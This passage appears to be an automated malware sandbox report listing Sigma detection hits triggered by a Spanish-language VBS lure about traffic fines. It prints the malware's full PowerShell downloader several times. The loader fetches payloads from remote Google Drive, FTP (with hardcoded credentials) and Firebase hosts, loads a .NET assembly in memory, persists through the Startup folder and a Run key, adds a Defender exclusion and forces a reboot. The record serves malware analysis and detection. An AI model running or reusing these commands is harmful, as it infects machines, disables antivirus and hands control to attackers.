notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1088, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 6524, ProcessName: powershell.exe
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", CommandLine|base64offset|contains: b~'r*', Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", ProcessId: 4956, ProcessName: wscript.exe
                        Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", CommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1088, ParentProcessName: powershell.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1", ProcessId: 5436, ProcessName: powershell.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_nyj
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit, CommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit, ProcessId: 7368, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1088, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 6524, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman
